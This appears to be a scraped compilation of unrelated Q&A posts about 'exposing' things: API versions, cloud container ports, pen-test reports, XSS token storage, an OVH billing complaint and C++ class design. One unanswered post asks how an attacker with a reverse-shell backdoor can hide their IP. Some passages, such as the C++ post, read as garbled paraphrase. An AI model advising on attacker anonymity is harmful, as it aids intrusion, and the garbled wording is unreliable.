API development – Exposing new version VS updating current version

Context

There is a back end and a front end team.

Back end exposes an endpoint to the front end app:

PATCH car/{carID}/tire

Problem

I want to update the aforementioned PATCH request functionality which will change the request’s body .

Solution

There are two options:

  • Change the current endpoint and ask the front end team to update the payload on the request’s body.
  • Create a new endpoint car/{engineID}/v2/tire , so the front end team can switch to this version when they see fit.

Question

I prefer the second approach, as it allows the two team to work asynchronously . The short coming here is that every time I will need to update this endpoint I will need to expose a newer version ??

In which scenarios should I follow the first approach, which actually breaks the current system ? Does this violates the open-closed principle ? Does the open-closed principle apply here ? Should I follow this principle in this scenario ? Is there another alternative to the two aforementioned methods ? Is there a design flaw that resulted in this scenario ?

amazon web services – EKS node not responding and not exposing container ports

So I’ve been struggling with the fact that I’m unable to expose any deployment in my eks cluster.

I got down to this:

  1. My LoadBalancer service public IP never responds
  2. Went to the load balancer section in my aws console
  3. Load balancer is no working because my cluster node is not passing the heath checks
  4. SSHd to my cluster node and found out that containers do not have ports associated to them:

enter image description here

This makes the cluster node fail the health checks, so no traffic is forwarded that way.

enter image description here

I tried running a simple nginx container manually, without kubectl directly in my cluster node:

docker run -p 80:80 nginx

and using the node public IP in my browser. No luck:

enter image description here

then I tried curling to the nginx container directly from the cluster node via ssh:

 curl localhost

And I’m getting this response: “curl: (7) Failed to connect to localhost port 80: Connection refused”

  1. Why are containers in the cluster node not showing ports?
  2. How can I make the cluster node pass the load balancer health checks?
  3. Could it have something to do with the fact that I created a single node cluster with eksctl?
  4. What other options do I have to easily run a kubernetes cluster in AWS?

How to share penetration tests results + remediation plan to third party companies without exposing one’s self

Normally, these kind of audits require an executive summary to be disclosed.

While security by obscurity is a universally recognized anti-pattern, it doesn’t mean you have to disclose full details of your vulnerabilities.

Problem 1: the self assessment

I trust the professionality of your DevOps guy. Without having to offend his skills, most external companies demand a reputable third party to perform the security assessment.

Your DevOps guy can be honest and professional, and provide real insights on the security. Or your DevOps guy can be insufficiently educated on security and miss important vulnerabilities. Or your DevOps guy can be a former Volkswagen employee (please, please, allow me some humour sometimes) and pretend there are no vulnerabilities just to make a good impression.

This is why companies demand an external trusted and reputable party

Problem 1.5: the cheap assessment to save money is a clear indicator that this penetration test is unlikely to work, irregardless that it found real security holes.

If you hire a reputable security company, they will do a more thorough test.

Problem 2: what to disclose

In general, these external suppliers/customers want to get an indication of your security levels to have business with your company.

An executive summary (that is, literally, a summary made to be read by high-level executives that don’t work with technical things) contains a list of known vulnerability types associated to a severity score.

It doesn’t contain details on how to exploit those.

Problem 3: mitigation

Please expect the suppliers to demand you to fix high-level vulnerabilities and re-assess the sytem.

Often they require to fix vulnerabilities rated >= 6 or 7, depending on the requirements. And then you will have to go through another scan and confirm the agreed vulnerabilities are not present anymore in the system

My case

Source: I was directly involved in such an activity.

In the past years, we had a code scan from Veracode as requested by one of our US customers before deploying our code on their premises.
Veracode is not a penetration test, it is an automated code static analysis tool. We had real pen-tests but they are out of the scope of this example.

It was part of the contract to share the full report with the customer, as they happened to sponsor the scan.

Later, we had an audit request from a Swiss bank we wanted to have business with, but they didn’t request to perform a security scan, they just demanded that we did and provided an executive summary.

We responded with the front page of that Veracode audit, displaying their logo and our company name. A few pages later, a table showed the list of remaining vulnerabilities (yes, we had, and yes, we fixed high-priority ones!) that were all scored < 6 out of 10. We gave that to our prospect as well.

We knew exactly where our vulnerabilities were, because Veracode highlighted file name and line number of suspect code. We never had to disclose such details to Swiss customer.

I don’t know what happened next, but probably we got the contract. I should ask my Sales Account Manager for details

google cloud platform – What GCP product to use to run Docker container exposing a range of UDP ports to public internet

I am confused about which GCP product to use such that I can run a Docker container e.g. like “docker run -p 5001-5110:5001-5110/udp hunter_ctrl_standalone:latest -s foo”. The container will use ca. 2 GB of RAM, 1 CPU. No load balancing needed.

It seems that Cloud Run is for HTTP(s) workloads only. GKE also looks like more for HTTP(s) workloads. Container on Compute Engine using Container Optimized OS (COS) does seem to do the trick, but then again according to https://cloud.google.com/compute/docs/containers/deploying-containers#limitations it is not possible to automatically operate the container through an API (only console plus gloud).

Do I miss a possibility? Is there a good overview for GCP runtime environments with their pros and cons?

tcp – Exposing different services on the same port

My current project contains multiple heterogeneous TCP servers, but our IT guys have clearly declared that they will give me only one 443 port, which is fair enough.

Two options are on the table now. One is VPN. We can set up a VPN server inside our cooperation and implement the access control. The other one is to implement some kind of software switch, which peeks the recognizable features of any (S) packet and then route the connection to responsible service. Our IT guys are neutral to both approaches for now before any evidence shows that one is superior than the other.

The pros of VPN are that it is a well-established technology and widely used in practice. In our scenario, it ensures sensitive information to be encrypted. The cons are the effort we will need to implement access control policies and mechanisms. The number of services will possibly grow, and the service will go multi-tenant, so it will become more complex.

The pros of the software switch are that it is simple to implement because the features/protocols of the sub-services are well known to us. The cons are that no such practices are heard before (I might be ignorant here), and we are not so confident if exposing such an in-house solution to the Internet is a good idea.

If you were me, what approach do you prefer? Why? Details can be clarified if needed and allowed.

I really appreciate any comments and answers.

Reverse shell from backdoor – exposing attacker? [duplicate]

If an attacker successfully installed a backdoor that connects to his computer via a reverse shell, how can the attacker hide his IP address?

I’d guess he can’t use Tor or a VPN, because packet forwarding would be quite impossible (is that correct?). Maybe he can use a different bought or hacked server as a proxy? How would he achieve that?

How can the attacker stay anonymous?

Are Javascript closures a useful technique to limit exposing data to XSS?

I’m wondering if using Javascript closures is a useful technique to limit exposing data to XSS? I realize it wouldn’t prevent an attack, but would it reliably make an attack more difficult to execute, or would it only make my code more irritating to write and read (a waste of time)?

I got the idea from the Auth0 documentation regarding storing OAuth/OIDC tokens. It reads:

Auth0 recommends storing tokens in browser memory as the most secure option. Using Web Workers to handle the transmission and storage of tokens is the best way to protect the tokens, as Web Workers run in a separate global scope than the rest of the application. Use Auth0 SPA SDK whose default storage option is in-memory storage leveraging Web Workers.

If you cannot use Web Workers, Auth0 recommends as an alternative that you use JavaScript closures to emulate private methods.

I can see how this is better than just putting the token or other sensitive information in localstorage. In localstorage an XSS attack needs only to execute localStorage.token to get the token.

Now, if you’re not familiar with tokens just apply this reasoning to any sensitive to information. In my case I want to build a client-side cache mapping user IDs to usernames for an administrative interface, but I realize that client IDs and usernames are somewhat sensitive, so I wondered if I could “hide” the data.

Exposing problems with OVH | Web Hosting Talk


Whenever a company tries to push me around, I have to expose the situation on online communities, they always do the right thing when exposed.

So here is the deal with OVH …

– I ordered a VPS, I tested it for some days, I was not happy with it, I took my data off it and moved to another provider.

– I then tried to cancel it, but it said there is nothing to cancel as there is no auto-renewal and unless I renew it, the service will be terminated at the end of the period.

– Next month on 1st of June, I received a new invoice for it

– I created a ticket and asked for invoice to be canceled, as I am not using that server and I had no auto-renewal

– I am asked to first use the “delete” function, it was deeper in the menus, I deleted the server that day and informed them.

– I get no reply for 10 days, I ask them again about this

I am told I should pay that invoice and I might receive OVH credit (no refund)

So why pay if I never used it and I am 100% it said auto-renewal was NOT enabled ?! I asked to cancel it hours after invoice, I never used it.

OVH Ticket number 3829965690

As a side note, here is why I was not happy with their VPS:

Every 4-5 hours they would take the server offline for exactly 15 minutes and claim it was under DDOS attack.

The server was never under attack, they do this whenever your site generates traffic, this is ridiculous and excuse me but PATHETIC.

After I moved all my data, server was unused, I downloaded a file from the server with WGET and I instantly got the “under attack” email and server blocked.

I was the only client on the server then, their anti-DDOS system is fully broken, many people saying exact same thing on TrustPilot.

Whenever they claimed I was “under DDOS attack” I asked them to show me sample IPs, they claimed they don’t have any https://www.webhostingtalk.com/

The VPS could be decent without the broken “anti-DDOS” and broken “support” staff.

What is the best way to provide access to Google Analytics in these circumstances without exposing all Google Analytics data?

In essence, an important Affiliate links to a URL in a domain registered by the Client. This URL redirects to a specific landing page for this Affiliate in the Customer's primary domain. The landing page has URL / offer and has a CTA for the Customer's purchase funnel.

As the first URL redirects to the second URL, there is no reference for GA.

The Affiliate would like to see Google Analytics data related to the traffic that the Affiliate sends to the Client: sessions, transactions, Objectives (including tickets to buy the funnel). The Client does not want to expose all the GA data of the Client to the Affiliate.

What is the best way to provide such access?

Initially I thought about the filters in a specific view for the affiliate. But of the options available, I don't think any of them will work.

c ++ – Is this a good way to divide class responsibilities without exposing private data?

I find that in most of the articles / theory that discuss the SRP it is often ignored how new classes that assume separate responsibilities access data that was once private for the original class. As such, I am struggling to find good ways to divide classes without exposing private data.

Take, for example, a Gripper class that represents a robotic clamp in a computer graphic simulation. This class handles the logic of a clamp, picks up objects, rotates them, places them in a different position, etc. The clamp can also be drawn in a GUI.

This breaks the SRP. There are 2 reasons for Gripper class to change: Changes in the logic of how a clamp works and changes in how a clamp is drawn. Nevertheless, Gripper It has some members of private data that are used both by logic and by the part of the drawing. Simply exposing those members through some (const) getters feels like a step back. I would expose the details of the implementation, I would just admit this new "interface" and it seems frankly incorrect.

Then I came up with this:

class Renderer
{
public:

    /* Takes the data needed to draw a gripper and does so. */
    void
    DrawGripper(const Foo& foo, const Qux& qux);

    /* Additional methods to draw other things. */
};

class Gripper
{
public:

    void
    Draw(Renderer& renderer) const
    {
        renderer.DrawGripper(mFoo, mQux);
    }

private:

    Foo mFoo;
    Bar mBar;
    Qux mQux;
};

Pro:

  • Better separation Apart from the Draw function, consisting of 1 line of code, all the drawing code has now disappeared Gripper.
  • Renderer It could be an abstract interface, allowing different implementations easily.
  • The data can be passed by constant reference to DrawGripper while a simple member function would have full access to all members.

Cons:

  • Gripper still has a Draw run and know about Renderer.

I feel that the scam is manageable hard. In the end, one of the reasons for Gripper to exist is to eventually be drawn on the screen, so the fact that it still has a Draw The function does not seem so bad. Perhaps this is a case of having to choose the lesser of the 2 evils? The alternative of exposing private data is much worse in my humble opinion.

Am I on the right path here? Is this a good system that can be implemented in cases like this? Any problem or better ways?